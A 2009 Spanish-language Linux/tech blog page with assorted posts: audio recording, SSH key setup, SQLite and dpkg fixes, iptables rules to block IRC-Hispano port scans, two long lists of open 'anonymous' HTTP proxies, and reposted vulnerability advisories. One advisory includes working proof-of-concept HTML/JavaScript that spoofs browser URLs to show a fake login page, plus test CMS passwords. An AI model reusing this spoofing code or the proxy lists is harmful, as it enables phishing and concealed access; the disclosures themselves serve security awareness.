Después de probar y probar al final encontré la manera de que me grabara sonido gtk-recordMyDesktop, el problema era que no me detectaba con la opción que tenia defecto gtk-recordMyDesktop ya que dispongo el micrófono lo tengo en una cámara USB logitech, al ver los log's una vez metida la cámara me di cuenta de que el dispositivo que debo usar es hw:1:


alsa-util.c: Device hw:1 doesn't support 44100 Hz, changed to 16000 Hz.


Lo que hice fue añadir a las opciones del gtk-recordMyDesktop hw:1,0 :


A partir de ahora ya puedo grabar sonido y vídeo :) .

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] Evitar un G-Line en el IRC al conectar

26 agosto 2009 Publicado por cLimbo 0 comentarios
Esto no es una critica para desprestigiar al irc-hispano si no intentar ayudar a la gente cuando le pase lo mismo.

Ayer al conectar al IRC cual es mi sorpresa que veo que el servidor de irc-hispano me hace un G-LINE, yo todo extrañado veo el mensaje del motivo y según este tenia abierto el puerto 9091 supuestamente utilizado por la red famosa TOR y claro, yo digo: ¿ como es posible ? :)

sudo fuser -v 9091/tcp
USER PID ACCESS COMMAND
9091/tcp: chakal 9016 F.... transmission

Veo que lo usaba transmission que es un programa famoso para descargar de la red torrent, veo que usa este puerto concretamente al activar el gestor web para manejar transmission remotamente por web (http://ip:9091), vale, ahora yo me pregunto: ¿ esto es un proxy o uso tor ?

El G-LINE supuesto por usar una conexión "no segura" (según ellos) duraba ni mas ni menos que 1 año xD, hay me las ingenie a duras penas con el iphone para conectar al irc y entrar a #opers_help donde al final después de 1 hora me quitaron el ban. Quite transmission para conectar.

No quise cambiar el puerto y tener que volver a mapear de nuevo en el router, según el irc-hispano tienen glineados los puertos: 9001 , 9030 , 9050 , 9051 , 9090 y el 9091 (más información en http://www.irc-hispano.es/ayuda/usuario/34-seguridad) y bueno, mi solución final fue banear los 2 routers que usan un rango de ip's por el cual llegaban los escaneo para detectar si tenia estos puertos abiertos que son: 194.149.72.0/22 y 194.149.73.0/24 (unos cuantos :) ), las reglas de iptables son simples:

sudo iptables -I INPUT -s 194.149.72.0/22 -j REJECT
sudo iptables -I INPUT -s 194.149.73.0/24 -j REJECT

ATENCIÓN: Esto también bloquea la pagina del http://www.irc-hispano.es , si usáis webchat deberéis añadir la siguiente regla:

sudo iptables -I INPUT 1 -s 194.149.73.154 -p tcp --sport 80 -j ACCEPT

Si dudáis sobre los puertos podeis escanear los puertos desde aqui que es del hispano.

Un saludo

Artículo cedido por un conocido; chakal^-^.
Etiquetas: , , ,

¿Cómo fabrica Kingston sus memorias USB?

25 agosto 2009 Publicado por cLimbo 0 comentarios
Hoy daremos un paseo por la planta de producción de Kingston, veremos cómo hacen sus pendrives desde cero;

Problemas con dpkg al actualizar el initrd viejo sin existir

24 agosto 2009 Publicado por cLimbo 0 comentarios
Hoy estaba actualizando mi Acer Aspire One modelo A110 y que sorpresa me llevo cuando había paquetes sin configurar, digo vale, incluso me lo dice en la consola cuando hago la actualización que haga esto:

sudo dpkg --configure -a

Hasta que no hagamos esto no podemos instalar ningún paquete mas. El problema viene cuando intenta crear/actualizar el initrd de un kernel viejo que lo borre ya que uso uno actual y me parece una tontería tener 40 kernel sin usar y mas teniendo solo 8GB de capacidad de disco solo :) . La carpeta de /lib/modules/2.6.28-v5.aspire1 la borre por que uso la versión 2.6.28-generic entonces dpkg se quejaba.

La solución fue borrarla para que no me tocara las narices:

sudo update-initramfs -k 2.6.28-v5.aspire1 -d

En este paso me daba un error, me decía que no existía /boot/2.6.28-v5.aspire1 por lo que le engaño creando el archivo :P

sudo touch /boot/2.6.28-v5.aspire1
sudo update-initramfs -k 2.6.28-v5.aspire1 -d

Ahora si me deja hacer el configure:

sudo dpkg --configure -a

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] Compacta y repara bases de datos SQLite

23 agosto 2009 Publicado por cLimbo 0 comentarios
SQLite es un sistema de gestión de bases de datos relacional compatible con ACID, y que está contenida en una relativamente pequeña (~225 kB[1] ) biblioteca en C.

Cuando creamos una tabla, base de datos o datos y estos se han eliminado/borrado se deja el espacio vacío en la misma, este espacio vacío se reutilizarán la próxima vez que se añade nueva información a la base de datos, pero mientras tanto, el archivo de base de datos podría ser más grande. Además, las frecuentes inserciones, actualizaciones, puede causar que base de datos se fragmente.

Por ejemplo firefox mantiene una base de datos en sqlite donde almacena los datos del firefox resulta conveniente compactar para eliminar datos erróneos o borrados de la base de datos.

Para compactar y corregir todos los ficheros sqlite tan fácil como este pequeño script:

for db in `locate '*.sqlite'`; do
sqlite3 'VACUUM' $db 2>/dev/null
done

Para que resulte eficaz deberemos cerrar los programas que usan esta base de datos si no veremos algo como:

SQL error: database is locked

Si no tenemos sqlite3 deberemos de instalarlo:

sudo aptitude install sqlite3


Hay alguna aplicación que nos permite visualizar los datos incluso añadir datos nuevos o crear bases de datos, tablas:

sudo aptitude install sqlitebrowser


Es tan fácil como decirle a nuestro gestor de archivos que los ficheros sqlite los abra con sqlitebrowser, a partir de este momento podremos operar sobre la base de datos y nos resultara útil también para compactar la base de datos ya que este programita cuenta con dicha utilidad:



Desde la linea de comandos podremos interactuar con nuestra base de datos de esta manera:

sqlite3 db.sqlite


La sintaxis es prácticamente igual a MySQL y os resultara familiar si sabéis MySQL.

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] Autenticación automática en ssh usando una clave rsa

22 agosto 2009 Publicado por cLimbo 0 comentarios
Yo normalmente uso mucho ssh para administrar mi maquina en red. Cada vez que entro al servidor ssh por defecto tiene configurada la autentificación por password para acceder a la maquina pero hoy he cambiado de método, ahora uso identificación basada en RSA, esto es mas seguro y mas cómodo, seguro por que la clave aunque la conozcan no pueden entrar y es mas cómodo por que no tenemos que meter la clave, con tan solo:

ssh usuario@host

vale :)

Para hacer este proceso lo primero que debemos hacer es permitir la autentificación RSAAuthentication y configurar la AuthorizedKeysFile donde están las claves de paso para las maquinas que forman el anillo de confianza en la red, para ello editamos el archivo /etc/ssh/sshd_config en la maquina donde esta el servidor ssh al cual pretendemos entrar:

sudo nano /etc/ssh/sshd_config

Buscamos estas claves y en caso que estén comentadas las descomentamos:
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys

También he deshabilitado el acceso ssh mediante password para que en el caso que no posean la key no accedan por password:
PasswordAuthentication no

Tener en cuenta que RSAAuthentication es para SSH1 y PubkeyAuthentication para SSH2, de todas maneras no pasa nada por descomentar ambas, salvamos el fichero y reiniciamos el demonio:

sudo /etc/init.d/ssh restart


Ahora en la otra maquina o maquinas creamos la clave RSA y la exportamos al servidor ssh:

ssh-keygen -t rsa
cat .ssh/id_rsa.pub | ssh usuario@host "cat - >> .ssh/authorized_keys"


Con esto ya esta listo, para acceder tan simple como:

ssh usuario@host


Nos pedirá una clave la 1 vez en la sesión, esta se almacenara y no nos la pedirá mas veces hasta que no cerremos sesión. Si estamos por consola sin X tenemos que ejecutar estos 2 comandos:

ssh-agent /bin/bash
ssh-add


Nos pedirá igualmente la clave de paso y ya no nos la pedirá mas veces hasta que cerremos la sesión. Podemos guardarlo en nuestro ~/.bashrc para ahorrarnos el proceso:

echo "ssh-agent /bin/bash" >> ~/.bashrc
echo "ssh-add" >> ~/.bashrc


Des esta manera todos los procesos hijos que se inicien a partir de ahora se almacenaran. De igual manera podemos agilizarlo si usamos un entorno gráfico:

echo "ssh-agent /usr/X11R6/bin/X" >> ~/.xinitrc
echo "ssh-add" >> ~/.bashrc


Una cosa importante es cambiar los permisos del archivo authorized_keys del servidor ssh para que sea solo visible por el usuario y ningún usuario no autorizado pueda leer la clave:

chmod 600 .ssh/authorized_keys


Hacemos lo mismo en nuestra maquina con el archivo id_rsa.pub y id_rsa:

chmod 600 .ssh/id_rsa*


Esto es uno de los métodos mas seguros y nos ahorramos problemas ya que como sabéis la gente siempre intenta entrar por fuerza bruta a servidores ssh por la red y como tenemos RSA no podrán acceder a menos que posean el archivo id_rsa.pub en su sistema cosa poco menos que probable a no ser que físicamente acceda al pc.

Un saludo

Artículo cedido por un conocido; chakal^-^.

Implementación de WebChat

Publicado por cLimbo 0 comentarios
A través de aquí podrás acceder a nuestro canal, alojado en iRC-Hispano, con referencia a algún problema y/o duda no resuelta en el blog.

Etiquetas: ,

Proxies HTTP Anónimos 17-08-09

18 agosto 2009 Publicado por cLimbo 0 comentarios
124.207.168.48:808
164.77.170.67:8080
174.142.24.201:3128
193.220.87.121:8080
194.250.131.225:80
194.106.115.116:80
194.224.84.3:80
194.3.18.22:80
195.139.235.200:80
200.43.221.67:80
200.57.93.231:8080
201.12.64.153:80
190.72.25.48:80
210.51.184.62:80
212.138.84.62:8080
217.110.205.60:80
218.56.64.212:8080
221.131.124.22:80
221.181.244.161:80
218.252.41.203:80
202.116.32.92:8080
221.238.193.163:80
61.7.161.228:3128
88.200.224.246:3128
69.13.197.165:80
98.129.147.1:80
74.206.98.202:8080
77.221.99.10:80
77.94.32.98:80
212.24.238.155:80
78.143.252.226:80
93.187.17.201:80
97.65.164.212:8080
110.8.253.100:80
113.253.14.210:808
114.127.246.36:8080
118.98.232.202:8080
118.98.32.34:80
119.167.225.136:8080
121.187.121.189:80
122.155.0.244:3128
124.172.110.158:80
130.208.220.85:80
141.223.237.76:8080
146.242.199.231:80
146.83.8.31:8080
147.102.85.32:80
147.171.65.3:80
148.244.223.236:80
157.100.50.179:3128
159.149.133.193:80
160.78.84.1:443
173.32.83.25:9090
174.129.114.178:80
174.142.104.57:3128
174.142.32.143:80
174.143.236.197:80
190.102.206.48:8080
190.12.67.130:8081
190.14.254.162:443
190.153.90.114:80
190.196.15.125:8080
190.196.15.157:80
190.27.194.90:8080
192.107.168.129:80
193.109.166.22:3128
193.171.32.6:80
193.188.70.3:8080
193.210.148.195:80
193.251.88.4:8080
193.254.217.250:8080
194.100.9.12:80
194.72.50.238:80
195.154.158.18:80
195.209.224.91:3128
195.22.241.178:3128
195.229.62.157:8080
200.131.43.180:8080
200.135.2.171:49400
200.164.74.75:8080
200.31.42.3:80
200.46.3.46:3128
200.54.148.34:80
200.65.127.161:3128
200.65.127.161:8083
201.15.232.96:8080
201.17.162.45:8080
201.18.52.154:6588
201.225.188.9:3128
201.225.226.68:8080
201.226.192.11:8080
201.92.253.33:3128
202.101.180.226:8080
202.131.98.165:80
202.143.155.44:80
202.175.26.145:80
202.3.217.125:8080
202.44.4.85:8081
202.54.61.99:8080
202.59.28.104:80
202.99.29.27:80
203.110.245.250:80
208.106.250.202:80
208.109.163.53:8081
208.79.234.72:8080
208.96.213.149:80
209.47.251.243:80
209.98.77.24:3128
210.211.148.46:8080
210.212.130.54:8090
211.141.86.152:8080
211.183.3.9:80
211.38.131.22:80
212.103.139.75:80
212.191.130.227:8080
212.31.225.83:3128
217.219.147.141:80
218.108.44.170:808
218.242.239.61:8080
218.248.21.194:80
218.25.99.135:808
218.50.52.210:80
218.56.64.210:8080
219.150.144.58:80
219.239.11.182:80
219.37.208.150:8080
219.94.84.102:8080
220.66.203.5:80
221.204.253.154:8088
222.41.10.70:1337
222.83.228.34:8080
24.127.136.205:9090
41.210.252.11:8080
58.145.187.8:8080
58.176.56.189:9090
58.24.153.235:8080
58.248.74.20:8089
58.27.140.58:8080
58.63.109.66:8080
58.64.162.228:80
59.162.33.158:8080
59.36.98.154:80
59.77.6.183:808
60.63.26.246:80
61.144.66.53:8080
61.152.182.239:80
61.167.117.83:8080
61.189.86.48:8080
62.149.211.207:8080
62.213.87.20:80
62.33.11.104:3128
63.119.14.20:80
64.186.132.60:2401
65.182.203.38:80
66.114.252.244:80
66.119.43.30:80
66.119.43.31:80
66.119.43.34:80
66.119.43.36:80
66.119.43.37:80
66.173.241.16:80
66.55.8.51:13401
69.7.105.30:8080
70.69.189.13:9090
71.207.241.124:707
74.222.1.99:8080
75.101.188.125:80
75.145.241.73:8080
77.223.175.40:8080
77.88.66.251:8000
78.108.105.47:3128
78.36.103.231:8080
79.160.177.10:8080
79.98.40.53:80
80.13.219.238:3128
80.255.197.16:9090
81.180.75.142:8080
82.145.197.249:8080
83.18.28.130:3128
83.232.98.229:3128
83.69.207.42:3128
83.96.39.196:80
85.115.20.76:8080
85.214.113.101:1113
85.249.33.2:3128
87.229.73.113:80
88.191.108.193:3128
88.191.63.27:8080
88.201.172.105:3128
88.249.32.247:8088
88.62.97.132:8080
89.144.101.12:8080
89.149.208.95:80
89.165.40.10:8080
89.96.169.141:80
90.156.232.52:3128
91.112.157.214:1080
91.121.135.73:80
91.121.85.162:80
91.121.91.61:3128
91.201.11.86:3128
92.243.188.180:3128
92.61.98.3:80
93.63.233.254:80
94.143.184.33:80
94.23.217.145:80
95.57.220.130:8080
98.222.42.233:80
75.118.136.75:58159
212.62.110.20:8080
79.160.177.10:8080
210.212.160.101:8080
118.98.160.102:8080
218.56.64.210:8080
91.92.165.253:3128
88.191.46.33:3128
201.144.213.18:3128
218.14.227.197:3128
148.233.239.23:3128
189.109.46.210:3128
219.93.175.67:3128
211.95.176.6:808
188.122.239.127:808
212.116.219.102:443
208.100.40.34:80
213.203.241.210:80
61.135.179.52:80
86.108.4.147:80
212.62.97.23:80
212.62.97.20:80
196.213.174.130:3128
200.40.156.66:8080
190.128.225.182:8080
203.172.242.148:80
125.162.237.127:8080
218.103.42.27:80
196.213.180.50:8080
61.144.66.53:8080
195.87.102.7:80
202.129.49.234:8080
202.145.3.106:3128
200.217.70.39:80
203.172.243.100:80
95.57.220.130:8080
58.64.162.228:80
114.57.163.37:8080
202.138.251.190:8080
160.78.84.1:443
194.158.247.125:8080
196.41.132.28:80
Etiquetas: , , ,

Multiple Browsers Fake url folder & file Same origin Spoof

15 agosto 2009 Publicado por cLimbo 0 comentarios
#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
Artículo original: http://lostmon.blogspot.com/2009/08/multiple-browsers-fake-url-folder-file.html
##########################################

##############
Resumen
##############

Un usuario abre su navegador e intenta entrar en http://www.host.com/admin/admin.php y se encuentra en esta URL
el servidor remoto y si el usuario tiene privilegios, puede acceder al archivo admin.php

Si el archivo admin.php no existe en el servidor al usuario le da un erorr 404 el servidor http.

Si el usuario intenta entrar a http://www.host.com/admin/ y esta dir no está en el servidor, el usuario obtiene de nuevo un http error 404.

Si el usuario pulsa el botón recargar la página vuelve a cargar el contenido y si el usuario presiona CTRL + F5 actualiza todo el contenido de la página.

Algunas veces los errores http como 404, 403, etc son administrados por una tercera parte, una barra de herramientas, o con un contenido predefinido dinámico construido en el interior del navegador.

#######################
Explicación
#######################

Múltiples navegadores tienen un error en esta solicitud de respuesta que permiten a un atacante suplantar la url o falso el contenido de un archivo o ruta inexistente o falsa la url y el contenido de un archivo o una ruta de confianza.

También un atacante puede "trampear" la falsa url del explorador en internet y cuando el usuario pulse la tecla F5 o el botón Actualizar, muestre la página con el contenido falso o si el usuario presiona CTRL + F5 la página muestre el contenido falso, sólo en este último caso, el navegador Opera no funciona.

##################
Pruebas
##################

He estado probando con Windows XP Home SP3 con todos los parches.

Para la prueba vamos a escribir una secuencia de comandos como:

####################
CÓDIGO FUENTE DE POC
####################
Prueba de Concepto en línea => http://cmspatch.200u.com/urlspoof.html
<html>
<head></head><body>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h3></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a> this file exist in the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password.
<p></p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Portected folder. user terrapro pass mayoristas.</strong>
<p>

<script>
function spoofolder()
{
a = window.open('modules/login')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open('modules/system/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open('protected/admin/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
</script>
</body></html>

######## FIN DEL CÓDIGO #####

Lo guardamos como c:/test/urlspoof.html por ejemplo.

Yo uso una alerta para mostrar la verdadera window.location.

para la prueba he abierto el archivo con file:/// que es un manejador de protocolo y remoto, para la prueba he cargado el archivo en un servidor: un apache en windows 2003 y en un Apache sobre Linux Red Hat.

servidor de windows:

Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com

servidor de linux:

Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com
en todos los casos de prueba el servidor envía la correctamente la respuesta HTTP.

########################
Navegadores afectados en local
########################

Para esta prueba el uso de archivos i manejador de protocolo y
sólo archivo de prueba y falso camino falso.

1 - Firefox 3.5.1 y 3.5.2
urlspoof es abierto a través del archivo c:/test/urlspoof.html y al hacer clic en cualquier función en falso al firefox, muestran la falsa url y el contenido. (firefox 3.5.2 no parece vulnerable)

2 - Lunascape 5.1.3 y 5.1.4 (Trident swiched a motor)
urlspoof abierto a través de archivo c:/test/urlspoof.html y hacer clic en cualquier función en falso al Lunascape muestra los casos de url falsa y el contenido falseadas.

3 - Orca 1,2 build 2 no parecen vulnerables, pero cuando busca el archivo al añadir a los navegadores wyciwyg url://4/ ejecuta el contenido falso.

4 - Flock 2.5.1
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en falso en cualquier función en todos los casos muestran la url falsa y el contenido falseadas.

5 - K-Meleon 1.5.3
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en falso en cualquier función en todos los casos K-Meleon muestra la url falsa y el contenido falseadas.

6 - SeaMonkey 1.1.17
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en
falso en cualquier función, en todos los casos muestra la url falsa y el contenido falseadas.

7 - Avant 11,7 build 36
urlspoof es abierto a través de archivo c: /prueba/urlspoof.html y haga clic en falso en cualquier función, en todos los casos muestran la url falsa y el contenido falseadas.

Google Chrome 2.0.172.39 (Build oficial)
escribe en todos los casos en about: blank.

Internet Explorer 8 no parece vulnerable a través de file: protocol

########################
Navegadores remotos afectados
########################

Para esta prueba de seguridad, subid el archivo a un servidor y busca el archivo a través de http://host.com/urlspoof.html

1 - Internet Explorer 7 y 8
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las pruebas muestra el árbol de archivos falsa, patch falso, y "pseudo-bypass"

2 - Avant 11,7 build 35 y build 36
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las prueba muestran el árbol de archivos falsa, patch falso, y "pseudo-bypass" auth basic protection.

1 - Internet Explorer 7 y 8
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las
prueba muestran el árbol de archivos falsa, falsa vía, y "pseudo-bypass"
autoridades de protección básica.

2 - Avant 11,7 navegador construir 35 y construir 36
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las
prueba muestran el árbol de archivos falsa, falsa vía, y "pseudo-bypass"
autoridades de protección básica.

3 - Lunascape 5.1.3 y 5.1.4 (Trident swiched a motor)
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las prueba muestra el árbol de archivos falsos, patch falso, y "pseudo-bypass" auth basic protection.

4 - Navegador Maxthon 2.5.3.80 UNICODE
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las pruebas muestra el árbol de archivos falsos, patch falso, y "pseudo-bypass" auth basic protection.

Google Chrome escribe en todos los casos en el about:blank

#################
Trampa en cuestión
#################

Todas las superficies afectadas de los navegadores, cuando usted está en la url falsa al intentar actualizar la ubicación, a través de CTRL + F5, f5 o similares, el navegador no mostrará un error HTTP 404, que siguen mostrando la ubicación de la página falsa.

Es muy interesante, porque un atacante puede crear un archivo "fantasma" en una dir "fantasma", en el caso de la falsificación de archivos, se puede suplantar cualquier página web en el servidor, con la falsa página, cuando el usuario intenta volver a cargar o recargar el navegador muestra la página falsa: OJO! NO es la ubicación real de la página.

##################€nd ##################

Thnx to cLimbo for Spread the Word
Thnx to estrella to be my ligth.
Thnx to all Lostmon Groups Team.

--
atentamente:
Lostmon (lostmon@gmail.com)
-------

thz Lost ;-)

Bing.com WebmasterAuthenticationInformationPage.aspx XSS

14 agosto 2009 Publicado por cLimbo 0 comentarios

###########################################
Bing.com WebmasterAuthenticationInformationPage.aspx XSS
URL del vendedor: http://ww.bing.com
Reportado: http://lostmon.blogspot.com/2009/08/bingcom-webmasterauthenticationinformat.html
Vendedor avisado: Confirmación vendedor:
###########################################

El motor de búsqueda Bing, contiene un error que permite ataques cross site scripting.
Este defecto existe porque la solicitud no valida correctamente la variable 'authTag para la presentación de 'WebmasterAuthenticationInformationPage.aspx' podría script. Esto permite a un usuario crear una URL especialmente preparada para ejecutar código arbitrario en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, lo que lleva a una pérdida de integridad.

Un atacante puede componer un enlace incorrecto en la variable 'WebmasterAuthenticationInformationPage.aspx' y el consiguiente código, es escribir en dos cajas y en el 'LiveSearchSiteAuth.xml'.

Un usuario remoto puede redactar un enlace incorrecto en la variable de ' WebmasterXMLAuthDownloadPage.aspx', para descargar 'LiveSearchSiteAuth.xml' => es éste el archivo que contiene el código malicioso.

#########
solución:
##########

Que el vendedor cree un parche

#############
Cronología:
#############

Descubierto: 18-junio-2009
notificado al vendedor: 07-08-2009
proveedores de respuesta: 07-08-2009
vendedor respuesta sobre parche: 13-08-2009
publicado: 13-08-2009

################ End #####################

Thnx to Microsoft Security Response Center (MSRC)
http://blogs.technet.com/msrc/
thnx to estrella to be my ligth
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
----

thz Lost ;-)

Explicaremos los diseños de los logotipos de algunos sistemas operativos

12 agosto 2009 Publicado por cLimbo 0 comentarios
Parte fundamental de cualquier marca es su imagen y la máxima expresión de esa imagen viene dada por su logotipo. Será el principal pilar encargado de, entre otras cosas, identificar de forma inequívoca determinada empresa.

Tux, el pingüino:


Si hay un pingüino famoso en la red ese es sin duda Tux, la mascota oficial del kernel de Linux. Fue una elección personal de Linus Torvalds, el nombre del bicho es el acrónimo de (T)orvalds (U)ni(X).

Ubuntu, círculo de unidad:



A primera vista parece que el logo de Ubuntu es un simple círculo rojo, naranja y amarillo con unos puntos. Ahora fíjate bien y podrás ver que en realidad son tres personas formando un círculo cogidos de la mano.

Se pretende representar unidad, lo que también tiene relación con el nombre del sistema operativa. Ubuntu es una expresión africana que describe solidaridad y compasión.

Google Chrome OS, la esfera:



Aún no se sabe pero es probable que Chrome OS tome prestado el logotipo del navegador Google Chrome, quizás con pequeños cambios aunque manteniendo la estructura básica.

El logotipo es una esfera con aspecto “robótico” de colores y podríamos decir que está influenciado por varios otros. Desde el de Windows (los colores), las “Pokeballs” de los Pokémon o el juego de memoria Simón. Por otro lado es una poderosa imagen, intenta imitar el globo ocular humano que significa conocimiento y visión.

Redhat, el hombre misterioso:


Personalmente el logotipo de RedHat es de los que más me gusta por el “misterio” que desprende. Justamente esa es la idea que quieren transmitir los del sistema operativa abierto, estar rodeados por una atmósfera enigmática.

Por otro lado se cuenta que el padre de Marc Ewing, uno de los fundadores de la empresa, le regaló un sombrero rojo y blanco (el oficial de los jugadores de lacrosse de la universidad de Cornell) que no se quitaba ni para ir al baño y de ahí nació la idea para el nombre de la distribución y el logotipo (existen varias versiones de esta historia).

Mac OS X, se olvida de la manzana:



La marca principal de Apple es sin duda la manzana con un mordisco en uno de los lados, pero en el 2001 los de Cupertino deciden cambiar radicalmente e introducen una X mayúscula con aspecto metálico para representar a su sistema operativo Mac OS X.

La X es estilo metal brillante y pulido para representar un radical nuevo sistema operativo con menús metálicos y look minimalista.

openSUSE, el camaleón:


La mascota oficial del kernel de Linux es un pingüino como decíamos. Pues bien, al software libre le gustan los animales y la distribución SUSE usa otro para su logo, en este caso un camaleón. Los usuarios lo bautizaron con el nombre de Geeko que sale de contraer la palabra geek (¿hace falta definición?) y gecko, un pequeño lagarto que vive e climas templados.

Vía | ALT1040

Proxies HTTP Anónimos 10-08-09

10 agosto 2009 Publicado por cLimbo 0 comentarios
190.31.107.242:8080
190.139.116.102:8080
218.103.42.27:80
195.87.102.7:80
202.129.49.234:8080
201.248.89.208:8080
160.78.84.1:443
212.24.238.155:80
88.208.222.14:80
88.41.111.190:8080
189.11.127.30:3128
88.191.250.67:8118
221.0.213.155:8080
202.138.238.45:3128
80.26.126.224:8085
203.89.25.133:80
77.242.169.70:8081
218.26.96.68:8080
202.147.189.43:8080
60.253.119.18:8080
76.98.248.124:8085
209.91.156.180:8085
70.188.105.37:8085
83.162.38.83:8080
62.215.182.13:80
202.175.26.145:80
222.68.207.11:80
87.229.73.113:80
66.114.252.244:80
117.32.251.246:80
24.191.64.208:8085
69.112.97.79:8085
24.185.139.186:8085
200.31.42.3:80
89.222.221.123:8080
24.92.61.61:8085
76.110.90.227:8085
70.83.51.114:3128
204.210.154.169:8085
61.164.41.52:8080
24.117.107.217:8085
24.44.90.62:8085
76.20.188.138:8085
76.110.42.90:8085
70.172.242.142:8085
75.131.249.21:8085
174.142.32.143:80
213.249.207.89:8080
64.251.25.192:80
213.212.251.83:8080
207.237.157.205:8080
222.68.206.11:80
70.246.195.107:8085
91.184.202.66:80
212.102.0.104:8080
88.87.129.118:8000
24.190.229.111:8085
68.100.222.185:8085
69.112.167.111:8085
121.187.121.189:80
74.79.200.149:8085
68.193.20.3:8085
24.131.50.28:8085
189.80.205.130:80
61.89.162.75:8080
69.247.184.41:8085
67.163.38.125:8085
70.173.87.125:8085
67.166.225.236:8085
24.19.86.5:8085
68.108.158.132:8085
68.58.35.18:8085
76.104.245.48:8085
82.208.161.153:8080
68.62.246.31:8085
75.51.106.149:8085
85.88.195.34:3128
212.152.63.164:3128
68.227.129.228:8085
200.164.74.75:8080
62.217.43.115:8080
200.175.16.150:8080
72.178.36.94:8085
69.246.46.104:8085
68.60.169.74:8085
119.70.40.100:80
71.197.135.103:8085
114.127.246.36:8080
76.28.241.189:8085
72.218.164.26:8085
68.14.85.22:8085
70.186.168.50:8085
68.49.230.120:8085
68.0.177.107:8085
68.88.56.162:8085
80.148.22.89:8085
61.189.86.48:8080
221.214.27.252:808
193.254.217.250:8080
93.174.165.178:3128
70.119.22.24:8085
212.116.137.248:3128
75.180.33.22:8085
70.117.246.169:8085
67.177.181.169:8085
69.242.15.212:8085
218.132.56.25:80
69.116.204.103:8085
24.186.149.97:8085
68.49.229.9:8085
207.248.228.166:80
62.149.211.207:8080
68.230.225.122:8085
71.237.144.185:8085
203.67.172.47:8080
89.96.169.141:80
24.121.92.213:8085
72.208.32.114:8085
68.150.220.78:8085
68.103.199.151:8085
201.226.192.11:8080
24.230.35.147:8085
200.49.211.8:3128
71.11.249.240:8085
218.210.199.252:3128
190.102.206.48:8080
203.89.25.61:80
206.64.92.16:8000
70.158.130.207:8080
65.189.136.159:8085
77.226.249.230:80
98.156.116.192:8085
196.12.36.225:80
59.34.197.149:8080
59.152.238.51:80
61.28.162.228:3128
212.70.144.34:8085
110.8.253.100:80
210.238.74.137:80
24.175.216.123:8085
24.247.197.233:8085
200.175.97.42:80
97.74.115.75:80
119.167.225.136:8080
24.137.123.91:8085
66.173.241.16:80
24.163.104.46:8085
94.23.50.9:80
24.166.14.228:8085
116.93.16.20:8080
219.94.142.25:80
213.210.208.139:3128
213.197.183.254:81
77.93.197.83:80
69.118.60.157:8085
60.172.223.17:8080
62.213.87.20:80
201.6.252.237:8080
74.54.156.73:80
68.57.83.89:8085
91.121.85.162:80
97.107.130.146:80
190.147.134.6:80
88.191.17.209:443
221.0.213.155:8080
196.40.79.30:8080
204.160.110.126:80
68.2.253.155:8085
70.125.105.1:8085
174.143.232.17:80
212.103.139.75:80
122.169.195.161:80
201.15.232.96:8080
83.161.199.75:80
67.188.164.45:8085
202.44.4.85:8081
202.99.29.27:80
85.115.20.76:8080
200.232.115.145:3128
208.223.222.23:80
72.48.74.62:8085
77.246.52.118:8080
68.106.18.142:8085
190.27.194.90:8080
202.82.86.135:80
222.73.161.195:8080
213.61.56.178:80
221.116.142.90:80
110.8.253.100:80
112.96.28.68:80
114.127.246.36:8080
117.32.251.246:80
119.167.225.136:8080
122.155.0.244:3128
122.169.195.161:80
124.207.102.87:80
125.141.225.11:3128
138.89.197.35:8080
163.153.30.3:80
174.142.104.57:3128
174.142.24.201:3128
174.143.236.197:80
189.29.64.8:6588
190.102.206.48:8080
190.147.134.6:80
190.27.239.157:8080
192.107.168.129:80
192.192.169.230:80
193.188.70.3:8080
193.239.140.120:80
193.252.243.143:80
194.44.144.2:80
194.44.144.3:80
195.229.62.157:8080
196.40.79.30:8080
200.204.62.49:6588
200.31.42.3:80
200.65.127.161:8083
200.65.127.161:3128
201.217.204.22:8080
201.243.35.170:8080
201.251.248.34:3128
202.116.32.92:8080
202.175.26.145:80
202.185.65.3:80
202.188.222.2:8080
202.205.127.228:80
202.213.246.61:80
202.29.15.37:80
202.3.217.125:8080
202.53.12.183:80
202.54.61.99:8080
202.94.144.73:80
202.99.29.27:80
203.241.192.211:9090
207.237.157.205:8080
211.38.131.22:80
212.165.185.138:3128
212.98.50.204:80
213.212.251.83:8080
217.119.210.114:80
218.108.44.170:808
218.24.180.12:80
218.25.99.135:808
218.56.64.210:8080
218.56.64.211:8080
219.64.175.139:80
219.77.80.214:808
221.0.213.155:8080
